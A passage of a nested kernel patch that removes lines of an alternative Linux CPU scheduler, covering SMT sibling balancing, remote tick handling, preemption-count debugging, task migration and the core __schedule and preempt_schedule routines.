-+	return 0;
-+}
-+
-+/* sg_balance_trigger - trigger slibing group balance for @cpu */
-+static inline int sg_balance_trigger(const int cpu)
-+{
-+	struct rq *rq= cpu_rq(cpu);
-+	unsigned long flags;
-+	struct task_struct *curr;
-+	int res;
-+
-+	if (!raw_spin_trylock_irqsave(&rq->lock, flags))
-+		return 0;
-+	curr = rq->curr;
-+	res = (!is_idle_task(curr)) && (1 == rq->nr_running) &&\
-+	      cpumask_intersects(curr->cpus_ptr, &sched_sg_idle_mask) &&\
-+	      !is_migration_disabled(curr) && (!rq->active_balance);
-+
-+	if (res)
-+		rq->active_balance = 1;
-+
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+	if (res)
-+		stop_one_cpu_nowait(cpu, sg_balance_cpu_stop, curr,
-+				    &rq->active_balance_work);
-+	return res;
-+}
-+
-+/*
-+ * sg_balance - slibing group balance check for run queue @rq
-+ */
-+static inline void sg_balance(struct rq *rq)
-+{
-+	cpumask_t chk;
-+	int cpu = cpu_of(rq);
-+
-+	/* exit when cpu is offline */
-+	if (unlikely(!rq->online))
-+		return;
-+
-+	/*
-+	 * Only cpu in slibing idle group will do the checking and then
-+	 * find potential cpus which can migrate the current running task
-+	 */
-+	if (cpumask_test_cpu(cpu, &sched_sg_idle_mask) &&
-+	    cpumask_andnot(&chk, cpu_online_mask, sched_idle_mask) &&
-+	    cpumask_andnot(&chk, &chk, &sched_rq_pending_mask)) {
-+		int i;
-+
-+		for_each_cpu_wrap(i, &chk, cpu) {
-+			if (cpumask_subset(cpu_smt_mask(i), &chk) &&
-+			    sg_balance_trigger(i))
-+				return;
-+		}
-+	}
-+}
-+#endif /* CONFIG_SCHED_SMT */
-+
-+#ifdef CONFIG_NO_HZ_FULL
-+
-+struct tick_work {
-+	int			cpu;
-+	atomic_t		state;
-+	struct delayed_work	work;
-+};
-+/* Values for ->state, see diagram below. */
-+#define TICK_SCHED_REMOTE_OFFLINE	0
-+#define TICK_SCHED_REMOTE_OFFLINING	1
-+#define TICK_SCHED_REMOTE_RUNNING	2
-+
-+/*
-+ * State diagram for ->state:
-+ *
-+ *
-+ *          TICK_SCHED_REMOTE_OFFLINE
-+ *                    |   ^
-+ *                    |   |
-+ *                    |   | sched_tick_remote()
-+ *                    |   |
-+ *                    |   |
-+ *                    +--TICK_SCHED_REMOTE_OFFLINING
-+ *                    |   ^
-+ *                    |   |
-+ * sched_tick_start() |   | sched_tick_stop()
-+ *                    |   |
-+ *                    V   |
-+ *          TICK_SCHED_REMOTE_RUNNING
-+ *
-+ *
-+ * Other transitions get WARN_ON_ONCE(), except that sched_tick_remote()
-+ * and sched_tick_start() are happy to leave the state in RUNNING.
-+ */
-+
-+static struct tick_work __percpu *tick_work_cpu;
-+
-+static void sched_tick_remote(struct work_struct *work)
-+{
-+	struct delayed_work *dwork = to_delayed_work(work);
-+	struct tick_work *twork = container_of(dwork, struct tick_work, work);
-+	int cpu = twork->cpu;
-+	struct rq *rq = cpu_rq(cpu);
-+	struct task_struct *curr;
-+	unsigned long flags;
-+	u64 delta;
-+	int os;
-+
-+	/*
-+	 * Handle the tick only if it appears the remote CPU is running in full
-+	 * dynticks mode. The check is racy by nature, but missing a tick or
-+	 * having one too much is no big deal because the scheduler tick updates
-+	 * statistics and checks timeslices in a time-independent way, regardless
-+	 * of when exactly it is running.
-+	 */
-+	if (!tick_nohz_tick_stopped_cpu(cpu))
-+		goto out_requeue;
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	curr = rq->curr;
-+	if (cpu_is_offline(cpu))
-+		goto out_unlock;
-+
-+	update_rq_clock(rq);
-+	if (!is_idle_task(curr)) {
-+		/*
-+		 * Make sure the next tick runs within a reasonable
-+		 * amount of time.
-+		 */
-+		delta = rq_clock_task(rq) - curr->last_ran;
-+		WARN_ON_ONCE(delta > (u64)NSEC_PER_SEC * 3);
-+	}
-+	scheduler_task_tick(rq);
-+
-+	calc_load_nohz_remote(rq);
-+out_unlock:
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+out_requeue:
-+	/*
-+	 * Run the remote tick once per second (1Hz). This arbitrary
-+	 * frequency is large enough to avoid overload but short enough
-+	 * to keep scheduler internal stats reasonably up to date.  But
-+	 * first update state to reflect hotplug activity if required.
-+	 */
-+	os = atomic_fetch_add_unless(&twork->state, -1, TICK_SCHED_REMOTE_RUNNING);
-+	WARN_ON_ONCE(os == TICK_SCHED_REMOTE_OFFLINE);
-+	if (os == TICK_SCHED_REMOTE_RUNNING)
-+		queue_delayed_work(system_unbound_wq, dwork, HZ);
-+}
-+
-+static void sched_tick_start(int cpu)
-+{
-+	int os;
-+	struct tick_work *twork;
-+
-+	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
-+		return;
-+
-+	WARN_ON_ONCE(!tick_work_cpu);
-+
-+	twork = per_cpu_ptr(tick_work_cpu, cpu);
-+	os = atomic_xchg(&twork->state, TICK_SCHED_REMOTE_RUNNING);
-+	WARN_ON_ONCE(os == TICK_SCHED_REMOTE_RUNNING);
-+	if (os == TICK_SCHED_REMOTE_OFFLINE) {
-+		twork->cpu = cpu;
-+		INIT_DELAYED_WORK(&twork->work, sched_tick_remote);
-+		queue_delayed_work(system_unbound_wq, &twork->work, HZ);
-+	}
-+}
-+
-+#ifdef CONFIG_HOTPLUG_CPU
-+static void sched_tick_stop(int cpu)
-+{
-+	struct tick_work *twork;
-+
-+	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
-+		return;
-+
-+	WARN_ON_ONCE(!tick_work_cpu);
-+
-+	twork = per_cpu_ptr(tick_work_cpu, cpu);
-+	cancel_delayed_work_sync(&twork->work);
-+}
-+#endif /* CONFIG_HOTPLUG_CPU */
-+
-+int __init sched_tick_offload_init(void)
-+{
-+	tick_work_cpu = alloc_percpu(struct tick_work);
-+	BUG_ON(!tick_work_cpu);
-+	return 0;
-+}
-+
-+#else /* !CONFIG_NO_HZ_FULL */
-+static inline void sched_tick_start(int cpu) { }
-+static inline void sched_tick_stop(int cpu) { }
-+#endif
-+
-+#if defined(CONFIG_PREEMPTION) && (defined(CONFIG_DEBUG_PREEMPT) || \
-+				defined(CONFIG_PREEMPT_TRACER))
-+/*
-+ * If the value passed in is equal to the current preempt count
-+ * then we just disabled preemption. Start timing the latency.
-+ */
-+static inline void preempt_latency_start(int val)
-+{
-+	if (preempt_count() == val) {
-+		unsigned long ip = get_lock_parent_ip();
-+#ifdef CONFIG_DEBUG_PREEMPT
-+		current->preempt_disable_ip = ip;
-+#endif
-+		trace_preempt_off(CALLER_ADDR0, ip);
-+	}
-+}
-+
-+void preempt_count_add(int val)
-+{
-+#ifdef CONFIG_DEBUG_PREEMPT
-+	/*
-+	 * Underflow?
-+	 */
-+	if (DEBUG_LOCKS_WARN_ON((preempt_count() < 0)))
-+		return;
-+#endif
-+	__preempt_count_add(val);
-+#ifdef CONFIG_DEBUG_PREEMPT
-+	/*
-+	 * Spinlock count overflowing soon?
-+	 */
-+	DEBUG_LOCKS_WARN_ON((preempt_count() & PREEMPT_MASK) >=
-+				PREEMPT_MASK - 10);
-+#endif
-+	preempt_latency_start(val);
-+}
-+EXPORT_SYMBOL(preempt_count_add);
-+NOKPROBE_SYMBOL(preempt_count_add);
-+
-+/*
-+ * If the value passed in equals to the current preempt count
-+ * then we just enabled preemption. Stop timing the latency.
-+ */
-+static inline void preempt_latency_stop(int val)
-+{
-+	if (preempt_count() == val)
-+		trace_preempt_on(CALLER_ADDR0, get_lock_parent_ip());
-+}
-+
-+void preempt_count_sub(int val)
-+{
-+#ifdef CONFIG_DEBUG_PREEMPT
-+	/*
-+	 * Underflow?
-+	 */
-+	if (DEBUG_LOCKS_WARN_ON(val > preempt_count()))
-+		return;
-+	/*
-+	 * Is the spinlock portion underflowing?
-+	 */
-+	if (DEBUG_LOCKS_WARN_ON((val < PREEMPT_MASK) &&
-+			!(preempt_count() & PREEMPT_MASK)))
-+		return;
-+#endif
-+
-+	preempt_latency_stop(val);
-+	__preempt_count_sub(val);
-+}
-+EXPORT_SYMBOL(preempt_count_sub);
-+NOKPROBE_SYMBOL(preempt_count_sub);
-+
-+#else
-+static inline void preempt_latency_start(int val) { }
-+static inline void preempt_latency_stop(int val) { }
-+#endif
-+
-+static inline unsigned long get_preempt_disable_ip(struct task_struct *p)
-+{
-+#ifdef CONFIG_DEBUG_PREEMPT
-+	return p->preempt_disable_ip;
-+#else
-+	return 0;
-+#endif
-+}
-+
-+/*
-+ * Print scheduling while atomic bug:
-+ */
-+static noinline void __schedule_bug(struct task_struct *prev)
-+{
-+	/* Save this before calling printk(), since that will clobber it */
-+	unsigned long preempt_disable_ip = get_preempt_disable_ip(current);
-+
-+	if (oops_in_progress)
-+		return;
-+
-+	printk(KERN_ERR "BUG: scheduling while atomic: %s/%d/0x%08x\n",
-+		prev->comm, prev->pid, preempt_count());
-+
-+	debug_show_held_locks(prev);
-+	print_modules();
-+	if (irqs_disabled())
-+		print_irqtrace_events(prev);
-+	if (IS_ENABLED(CONFIG_DEBUG_PREEMPT)
-+	    && in_atomic_preempt_off()) {
-+		pr_err("Preemption disabled at:");
-+		print_ip_sym(KERN_ERR, preempt_disable_ip);
-+	}
-+	if (panic_on_warn)
-+		panic("scheduling while atomic\n");
-+
-+	dump_stack();
-+	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+}
-+
-+/*
-+ * Various schedule()-time debugging checks and statistics:
-+ */
-+static inline void schedule_debug(struct task_struct *prev, bool preempt)
-+{
-+#ifdef CONFIG_SCHED_STACK_END_CHECK
-+	if (task_stack_end_corrupted(prev))
-+		panic("corrupted stack end detected inside scheduler\n");
-+
-+	if (task_scs_end_corrupted(prev))
-+		panic("corrupted shadow stack detected inside scheduler\n");
-+#endif
-+
-+#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
-+	if (!preempt && READ_ONCE(prev->__state) && prev->non_block_count) {
-+		printk(KERN_ERR "BUG: scheduling in a non-blocking section: %s/%d/%i\n",
-+			prev->comm, prev->pid, prev->non_block_count);
-+		dump_stack();
-+		add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+	}
-+#endif
-+
-+	if (unlikely(in_atomic_preempt_off())) {
-+		__schedule_bug(prev);
-+		preempt_count_set(PREEMPT_DISABLED);
-+	}
-+	rcu_sleep_check();
-+	SCHED_WARN_ON(ct_state() == CONTEXT_USER);
-+
-+	profile_hit(SCHED_PROFILING, __builtin_return_address(0));
-+
-+	schedstat_inc(this_rq()->sched_count);
-+}
-+
-+/*
-+ * Compile time debug macro
-+ * #define ALT_SCHED_DEBUG
-+ */
-+
-+#ifdef ALT_SCHED_DEBUG
-+void alt_sched_debug(void)
-+{
-+	printk(KERN_INFO "sched: pending: 0x%04lx, idle: 0x%04lx, sg_idle: 0x%04lx\n",
-+	       sched_rq_pending_mask.bits[0],
-+	       sched_idle_mask->bits[0],
-+	       sched_sg_idle_mask.bits[0]);
-+}
-+#else
-+inline void alt_sched_debug(void) {}
-+#endif
-+
-+#ifdef	CONFIG_SMP
-+
-+#ifdef CONFIG_PREEMPT_RT
-+#define SCHED_NR_MIGRATE_BREAK 8
-+#else
-+#define SCHED_NR_MIGRATE_BREAK 32
-+#endif
-+
-+const_debug unsigned int sysctl_sched_nr_migrate = SCHED_NR_MIGRATE_BREAK;
-+
-+/*
-+ * Migrate pending tasks in @rq to @dest_cpu
-+ */
-+static inline int
-+migrate_pending_tasks(struct rq *rq, struct rq *dest_rq, const int dest_cpu)
-+{
-+	struct task_struct *p, *skip = rq->curr;
-+	int nr_migrated = 0;
-+	int nr_tries = min(rq->nr_running / 2, sysctl_sched_nr_migrate);
-+
-+	while (skip != rq->idle && nr_tries &&
-+	       (p = sched_rq_next_task(skip, rq)) != rq->idle) {
-+		skip = sched_rq_next_task(p, rq);
-+		if (cpumask_test_cpu(dest_cpu, p->cpus_ptr)) {
-+			__SCHED_DEQUEUE_TASK(p, rq, 0);
-+			set_task_cpu(p, dest_cpu);
-+			sched_task_sanity_check(p, dest_rq);
-+			__SCHED_ENQUEUE_TASK(p, dest_rq, 0);
-+			nr_migrated++;
-+		}
-+		nr_tries--;
-+	}
-+
-+	return nr_migrated;
-+}
-+
-+static inline int take_other_rq_tasks(struct rq *rq, int cpu)
-+{
-+	struct cpumask *topo_mask, *end_mask;
-+
-+	if (unlikely(!rq->online))
-+		return 0;
-+
-+	if (cpumask_empty(&sched_rq_pending_mask))
-+		return 0;
-+
-+	topo_mask = per_cpu(sched_cpu_topo_masks, cpu) + 1;
-+	end_mask = per_cpu(sched_cpu_topo_end_mask, cpu);
-+	do {
-+		int i;
-+		for_each_cpu_and(i, &sched_rq_pending_mask, topo_mask) {
-+			int nr_migrated;
-+			struct rq *src_rq;
-+
-+			src_rq = cpu_rq(i);
-+			if (!do_raw_spin_trylock(&src_rq->lock))
-+				continue;
-+			spin_acquire(&src_rq->lock.dep_map,
-+				     SINGLE_DEPTH_NESTING, 1, _RET_IP_);
-+
-+			if ((nr_migrated = migrate_pending_tasks(src_rq, rq, cpu))) {
-+				src_rq->nr_running -= nr_migrated;
-+				if (src_rq->nr_running < 2)
-+					cpumask_clear_cpu(i, &sched_rq_pending_mask);
-+
-+				rq->nr_running += nr_migrated;
-+				if (rq->nr_running > 1)
-+					cpumask_set_cpu(cpu, &sched_rq_pending_mask);
-+
-+				cpufreq_update_util(rq, 0);
-+
-+				spin_release(&src_rq->lock.dep_map, _RET_IP_);
-+				do_raw_spin_unlock(&src_rq->lock);
-+
-+				return 1;
-+			}
-+
-+			spin_release(&src_rq->lock.dep_map, _RET_IP_);
-+			do_raw_spin_unlock(&src_rq->lock);
-+		}
-+	} while (++topo_mask < end_mask);
-+
-+	return 0;
-+}
-+#endif
-+
-+/*
-+ * Timeslices below RESCHED_NS are considered as good as expired as there's no
-+ * point rescheduling when there's so little time left.
-+ */
-+static inline void check_curr(struct task_struct *p, struct rq *rq)
-+{
-+	if (unlikely(rq->idle == p))
-+		return;
-+
-+	update_curr(rq, p);
-+
-+	if (p->time_slice < RESCHED_NS)
-+		time_slice_expired(p, rq);
-+}
-+
-+static inline struct task_struct *
-+choose_next_task(struct rq *rq, int cpu, struct task_struct *prev)
-+{
-+	struct task_struct *next;
-+
-+	if (unlikely(rq->skip)) {
-+		next = rq_runnable_task(rq);
-+		if (next == rq->idle) {
-+#ifdef	CONFIG_SMP
-+			if (!take_other_rq_tasks(rq, cpu)) {
-+#endif
-+				rq->skip = NULL;
-+				schedstat_inc(rq->sched_goidle);
-+				return next;
-+#ifdef	CONFIG_SMP
-+			}
-+			next = rq_runnable_task(rq);
-+#endif
-+		}
-+		rq->skip = NULL;
-+#ifdef CONFIG_HIGH_RES_TIMERS
-+		hrtick_start(rq, next->time_slice);
-+#endif
-+		return next;
-+	}
-+
-+	next = sched_rq_first_task(rq);
-+	if (next == rq->idle) {
-+#ifdef	CONFIG_SMP
-+		if (!take_other_rq_tasks(rq, cpu)) {
-+#endif
-+			schedstat_inc(rq->sched_goidle);
-+			/*printk(KERN_INFO "sched: choose_next_task(%d) idle %px\n", cpu, next);*/
-+			return next;
-+#ifdef	CONFIG_SMP
-+		}
-+		next = sched_rq_first_task(rq);
-+#endif
-+	}
-+#ifdef CONFIG_HIGH_RES_TIMERS
-+	hrtick_start(rq, next->time_slice);
-+#endif
-+	/*printk(KERN_INFO "sched: choose_next_task(%d) next %px\n", cpu,
-+	 * next);*/
-+	return next;
-+}
-+
-+/*
-+ * Constants for the sched_mode argument of __schedule().
-+ *
-+ * The mode argument allows RT enabled kernels to differentiate a
-+ * preemption from blocking on an 'sleeping' spin/rwlock. Note that
-+ * SM_MASK_PREEMPT for !RT has all bits set, which allows the compiler to
-+ * optimize the AND operation out and just check for zero.
-+ */
-+#define SM_NONE			0x0
-+#define SM_PREEMPT		0x1
-+#define SM_RTLOCK_WAIT		0x2
-+
-+#ifndef CONFIG_PREEMPT_RT
-+# define SM_MASK_PREEMPT	(~0U)
-+#else
-+# define SM_MASK_PREEMPT	SM_PREEMPT
-+#endif
-+
-+/*
-+ * schedule() is the main scheduler function.
-+ *
-+ * The main means of driving the scheduler and thus entering this function are:
-+ *
-+ *   1. Explicit blocking: mutex, semaphore, waitqueue, etc.
-+ *
-+ *   2. TIF_NEED_RESCHED flag is checked on interrupt and userspace return
-+ *      paths. For example, see arch/x86/entry_64.S.
-+ *
-+ *      To drive preemption between tasks, the scheduler sets the flag in timer
-+ *      interrupt handler scheduler_tick().
-+ *
-+ *   3. Wakeups don't really cause entry into schedule(). They add a
-+ *      task to the run-queue and that's it.
-+ *
-+ *      Now, if the new task added to the run-queue preempts the current
-+ *      task, then the wakeup sets TIF_NEED_RESCHED and schedule() gets
-+ *      called on the nearest possible occasion:
-+ *
-+ *       - If the kernel is preemptible (CONFIG_PREEMPTION=y):
-+ *
-+ *         - in syscall or exception context, at the next outmost
-+ *           preempt_enable(). (this might be as soon as the wake_up()'s
-+ *           spin_unlock()!)
-+ *
-+ *         - in IRQ context, return from interrupt-handler to
-+ *           preemptible context
-+ *
-+ *       - If the kernel is not preemptible (CONFIG_PREEMPTION is not set)
-+ *         then at the next:
-+ *
-+ *          - cond_resched() call
-+ *          - explicit schedule() call
-+ *          - return from syscall or exception to user-space
-+ *          - return from interrupt-handler to user-space
-+ *
-+ * WARNING: must be called with preemption disabled!
-+ */
-+static void __sched notrace __schedule(unsigned int sched_mode)
-+{
-+	struct task_struct *prev, *next;
-+	unsigned long *switch_count;
-+	unsigned long prev_state;
-+	struct rq *rq;
-+	int cpu;
-+	int deactivated = 0;
-+
-+	cpu = smp_processor_id();
-+	rq = cpu_rq(cpu);
-+	prev = rq->curr;
-+
-+	schedule_debug(prev, !!sched_mode);
-+
-+	/* by passing sched_feat(HRTICK) checking which Alt schedule FW doesn't support */
-+	hrtick_clear(rq);
-+
-+	local_irq_disable();
-+	rcu_note_context_switch(!!sched_mode);
-+
-+	/*
-+	 * Make sure that signal_pending_state()->signal_pending() below
-+	 * can't be reordered with __set_current_state(TASK_INTERRUPTIBLE)
-+	 * done by the caller to avoid the race with signal_wake_up():
-+	 *
-+	 * __set_current_state(@state)		signal_wake_up()
-+	 * schedule()				  set_tsk_thread_flag(p, TIF_SIGPENDING)
-+	 *					  wake_up_state(p, state)
-+	 *   LOCK rq->lock			    LOCK p->pi_state
-+	 *   smp_mb__after_spinlock()		    smp_mb__after_spinlock()
-+	 *     if (signal_pending_state())	    if (p->state & @state)
-+	 *
-+	 * Also, the membarrier system call requires a full memory barrier
-+	 * after coming from user-space, before storing to rq->curr.
-+	 */
-+	raw_spin_lock(&rq->lock);
-+	smp_mb__after_spinlock();
-+
-+	update_rq_clock(rq);
-+
-+	switch_count = &prev->nivcsw;
-+	/*
-+	 * We must load prev->state once (task_struct::state is volatile), such
-+	 * that we form a control dependency vs deactivate_task() below.
-+	 */
-+	prev_state = READ_ONCE(prev->__state);
-+	if (!(sched_mode & SM_MASK_PREEMPT) && prev_state) {
-+		if (signal_pending_state(prev_state, prev)) {
-+			WRITE_ONCE(prev->__state, TASK_RUNNING);
-+		} else {
-+			prev->sched_contributes_to_load =
-+				(prev_state & TASK_UNINTERRUPTIBLE) &&
-+				!(prev_state & TASK_NOLOAD) &&
-+				!(prev->flags & TASK_FROZEN);
-+
-+			if (prev->sched_contributes_to_load)
-+				rq->nr_uninterruptible++;
-+
-+			/*
-+			 * __schedule()			ttwu()
-+			 *   prev_state = prev->state;    if (p->on_rq && ...)
-+			 *   if (prev_state)		    goto out;
-+			 *     p->on_rq = 0;		  smp_acquire__after_ctrl_dep();
-+			 *				  p->state = TASK_WAKING
-+			 *
-+			 * Where __schedule() and ttwu() have matching control dependencies.
-+			 *
-+			 * After this, schedule() must not care about p->state any more.
-+			 */
-+			sched_task_deactivate(prev, rq);
-+			deactivate_task(prev, rq);
-+			deactivated = 1;
-+
-+			if (prev->in_iowait) {
-+				atomic_inc(&rq->nr_iowait);
-+				delayacct_blkio_start();
-+			}
-+		}
-+		switch_count = &prev->nvcsw;
-+	}
-+
-+	check_curr(prev, rq);
-+
-+	next = choose_next_task(rq, cpu, prev);
-+	clear_tsk_need_resched(prev);
-+	clear_preempt_need_resched();
-+#ifdef CONFIG_SCHED_DEBUG
-+	rq->last_seen_need_resched_ns = 0;
-+#endif
-+
-+	if (likely(prev != next)) {
-+		if (deactivated)
-+			update_sched_preempt_mask(rq);
-+		next->last_ran = rq->clock_task;
-+		rq->last_ts_switch = rq->clock;
-+
-+		rq->nr_switches++;
-+		/*
-+		 * RCU users of rcu_dereference(rq->curr) may not see
-+		 * changes to task_struct made by pick_next_task().
-+		 */
-+		RCU_INIT_POINTER(rq->curr, next);
-+		/*
-+		 * The membarrier system call requires each architecture
-+		 * to have a full memory barrier after updating
-+		 * rq->curr, before returning to user-space.
-+		 *
-+		 * Here are the schemes providing that barrier on the
-+		 * various architectures:
-+		 * - mm ? switch_mm() : mmdrop() for x86, s390, sparc, PowerPC.
-+		 *   switch_mm() rely on membarrier_arch_switch_mm() on PowerPC.
-+		 * - finish_lock_switch() for weakly-ordered
-+		 *   architectures where spin_unlock is a full barrier,
-+		 * - switch_to() for arm64 (weakly-ordered, spin_unlock
-+		 *   is a RELEASE barrier),
-+		 */
-+		++*switch_count;
-+
-+		psi_sched_switch(prev, next, !task_on_rq_queued(prev));
-+
-+		trace_sched_switch(sched_mode & SM_MASK_PREEMPT, prev, next, prev_state);
-+
-+		/* Also unlocks the rq: */
-+		rq = context_switch(rq, prev, next);
-+	} else {
-+		__balance_callbacks(rq);
-+		raw_spin_unlock_irq(&rq->lock);
-+	}
-+
-+#ifdef CONFIG_SCHED_SMT
-+	sg_balance(rq);
-+#endif
-+}
-+
-+void __noreturn do_task_dead(void)
-+{
-+	/* Causes final put_task_struct in finish_task_switch(): */
-+	set_special_state(TASK_DEAD);
-+
-+	/* Tell freezer to ignore us: */
-+	current->flags |= PF_NOFREEZE;
-+
-+	__schedule(SM_NONE);
-+	BUG();
-+
-+	/* Avoid "noreturn function does return" - but don't continue if BUG() is a NOP: */
-+	for (;;)
-+		cpu_relax();
-+}
-+
-+static inline void sched_submit_work(struct task_struct *tsk)
-+{
-+	unsigned int task_flags;
-+
-+	if (task_is_running(tsk))
-+		return;
-+
-+	task_flags = tsk->flags;
-+	/*
-+	 * If a worker goes to sleep, notify and ask workqueue whether it
-+	 * wants to wake up a task to maintain concurrency.
-+	 */
-+	if (task_flags & (PF_WQ_WORKER | PF_IO_WORKER)) {
-+		if (task_flags & PF_WQ_WORKER)
-+			wq_worker_sleeping(tsk);
-+		else
-+			io_wq_worker_sleeping(tsk);
-+	}
-+
-+	/*
-+	 * spinlock and rwlock must not flush block requests.  This will
-+	 * deadlock if the callback attempts to acquire a lock which is
-+	 * already acquired.
-+	 */
-+	SCHED_WARN_ON(current->__state & TASK_RTLOCK_WAIT);
-+
-+	/*
-+	 * If we are going to sleep and we have plugged IO queued,
-+	 * make sure to submit it to avoid deadlocks.
-+	 */
-+	blk_flush_plug(tsk->plug, true);
-+}
-+
-+static void sched_update_worker(struct task_struct *tsk)
-+{
-+	if (tsk->flags & (PF_WQ_WORKER | PF_IO_WORKER)) {
-+		if (tsk->flags & PF_WQ_WORKER)
-+			wq_worker_running(tsk);
-+		else
-+			io_wq_worker_running(tsk);
-+	}
-+}
-+
-+asmlinkage __visible void __sched schedule(void)
-+{
-+	struct task_struct *tsk = current;
-+
-+	sched_submit_work(tsk);
-+	do {
-+		preempt_disable();
-+		__schedule(SM_NONE);
-+		sched_preempt_enable_no_resched();
-+	} while (need_resched());
-+	sched_update_worker(tsk);
-+}
-+EXPORT_SYMBOL(schedule);
-+
-+/*
-+ * synchronize_rcu_tasks() makes sure that no task is stuck in preempted
-+ * state (have scheduled out non-voluntarily) by making sure that all
-+ * tasks have either left the run queue or have gone into user space.
-+ * As idle tasks do not do either, they must not ever be preempted
-+ * (schedule out non-voluntarily).
-+ *
-+ * schedule_idle() is similar to schedule_preempt_disable() except that it
-+ * never enables preemption because it does not call sched_submit_work().
-+ */
-+void __sched schedule_idle(void)
-+{
-+	/*
-+	 * As this skips calling sched_submit_work(), which the idle task does
-+	 * regardless because that function is a nop when the task is in a
-+	 * TASK_RUNNING state, make sure this isn't used someplace that the
-+	 * current task can be in any other state. Note, idle is always in the
-+	 * TASK_RUNNING state.
-+	 */
-+	WARN_ON_ONCE(current->__state);
-+	do {
-+		__schedule(SM_NONE);
-+	} while (need_resched());
-+}
-+
-+#if defined(CONFIG_CONTEXT_TRACKING_USER) && !defined(CONFIG_HAVE_CONTEXT_TRACKING_USER_OFFSTACK)
-+asmlinkage __visible void __sched schedule_user(void)
-+{
-+	/*
-+	 * If we come here after a random call to set_need_resched(),
-+	 * or we have been woken up remotely but the IPI has not yet arrived,
-+	 * we haven't yet exited the RCU idle mode. Do it here manually until
-+	 * we find a better solution.
-+	 *
-+	 * NB: There are buggy callers of this function.  Ideally we
-+	 * should warn if prev_state != CONTEXT_USER, but that will trigger
-+	 * too frequently to make sense yet.
-+	 */
-+	enum ctx_state prev_state = exception_enter();
-+	schedule();
-+	exception_exit(prev_state);
-+}
-+#endif
-+
-+/**
-+ * schedule_preempt_disabled - called with preemption disabled
-+ *
-+ * Returns with preemption disabled. Note: preempt_count must be 1
-+ */
-+void __sched schedule_preempt_disabled(void)
-+{
-+	sched_preempt_enable_no_resched();
-+	schedule();
-+	preempt_disable();
-+}
-+
-+#ifdef CONFIG_PREEMPT_RT
-+void __sched notrace schedule_rtlock(void)
-+{
-+	do {
-+		preempt_disable();
-+		__schedule(SM_RTLOCK_WAIT);
-+		sched_preempt_enable_no_resched();
-+	} while (need_resched());
-+}
-+NOKPROBE_SYMBOL(schedule_rtlock);
-+#endif
-+
-+static void __sched notrace preempt_schedule_common(void)
-+{
-+	do {
-+		/*
-+		 * Because the function tracer can trace preempt_count_sub()
-+		 * and it also uses preempt_enable/disable_notrace(), if
-+		 * NEED_RESCHED is set, the preempt_enable_notrace() called
-+		 * by the function tracer will call this function again and
-+		 * cause infinite recursion.
-+		 *
-+		 * Preemption must be disabled here before the function
-+		 * tracer can trace. Break up preempt_disable() into two
-+		 * calls. One to disable preemption without fear of being
-+		 * traced. The other to still record the preemption latency,
-+		 * which can also be traced by the function tracer.
-+		 */
-+		preempt_disable_notrace();
-+		preempt_latency_start(1);
-+		__schedule(SM_PREEMPT);
-+		preempt_latency_stop(1);
-+		preempt_enable_no_resched_notrace();
-+
-+		/*
-+		 * Check again in case we missed a preemption opportunity
-+		 * between schedule and now.
-+		 */
-+	} while (need_resched());
-+}
-+
-+#ifdef CONFIG_PREEMPTION
-+/*
-+ * This is the entry point to schedule() from in-kernel preemption
-+ * off of preempt_enable.
-+ */
-+asmlinkage __visible void __sched notrace preempt_schedule(void)
-+{
-+	/*
-+	 * If there is a non-zero preempt_count or interrupts are disabled,
-+	 * we do not want to preempt the current task. Just return..
-+	 */
-+	if (likely(!preemptible()))
-+		return;
-+
-+	preempt_schedule_common();
-+}
-+NOKPROBE_SYMBOL(preempt_schedule);
-+EXPORT_SYMBOL(preempt_schedule);
-+
-+#ifdef CONFIG_PREEMPT_DYNAMIC
-+#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
-+#ifndef preempt_schedule_dynamic_enabled
-+#define preempt_schedule_dynamic_enabled	preempt_schedule
-+#define preempt_schedule_dynamic_disabled	NULL
-+#endif
-+DEFINE_STATIC_CALL(preempt_schedule, preempt_schedule_dynamic_enabled);
-+EXPORT_STATIC_CALL_TRAMP(preempt_schedule);
-+#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
-+static DEFINE_STATIC_KEY_TRUE(sk_dynamic_preempt_schedule);
-+void __sched notrace dynamic_preempt_schedule(void)
-+{
-+	if (!static_branch_unlikely(&sk_dynamic_preempt_schedule))
-+		return;
-+	preempt_schedule();
-+}
-+NOKPROBE_SYMBOL(dynamic_preempt_schedule);
-+EXPORT_SYMBOL(dynamic_preempt_schedule);
-+#endif
-+#endif
-+
-+/**
-+ * preempt_schedule_notrace - preempt_schedule called by tracing
-+ *
-+ * The tracing infrastructure uses preempt_enable_notrace to prevent
-+ * recursion and tracing preempt enabling caused by the tracing
-+ * infrastructure itself. But as tracing can happen in areas coming
-+ * from userspace or just about to enter userspace, a preempt enable
-+ * can occur before user_exit() is called. This will cause the scheduler
-+ * to be called when the system is still in usermode.
-+ *
-+ * To prevent this, the preempt_enable_notrace will use this function
-+ * instead of preempt_schedule() to exit user context if needed before
-+ * calling the scheduler.
-+ */
-+asmlinkage __visible void __sched notrace preempt_schedule_notrace(void)
-+{
-+	enum ctx_state prev_ctx;
-+
-+	if (likely(!preemptible()))
-+		return;
-+
-+	do {
-+		/*
-+		 * Because the function tracer can trace preempt_count_sub()
-+		 * and it also uses preempt_enable/disable_notrace(), if
-+		 * NEED_RESCHED is set, the preempt_enable_notrace() called
-+		 * by the function tracer will call this function again and
-+		 * cause infinite recursion.
-+		 *
-+		 * Preemption must be disabled here before the function
-+		 * tracer can trace. Break up preempt_disable() into two
-+		 * calls. One to disable preemption without fear of being
-+		 * traced. The other to still record the preemption latency,
-+		 * which can also be traced by the function tracer.
-+		 */
-+		preempt_disable_notrace();
-+		preempt_latency_start(1);
-+		/*
-+		 * Needs preempt disabled in case user_exit() is traced
-+		 * and the tracer calls preempt_enable_notrace() causing
-+		 * an infinite recursion.
-+		 */
-+		prev_ctx = exception_enter();
-+		__schedule(SM_PREEMPT);
-+		exception_exit(prev_ctx);
-+
-+		preempt_latency_stop(1);
-+		preempt_enable_no_resched_notrace();
-+	} while (need_resched());
-+}
-+EXPORT_SYMBOL_GPL(preempt_schedule_notrace);
-+
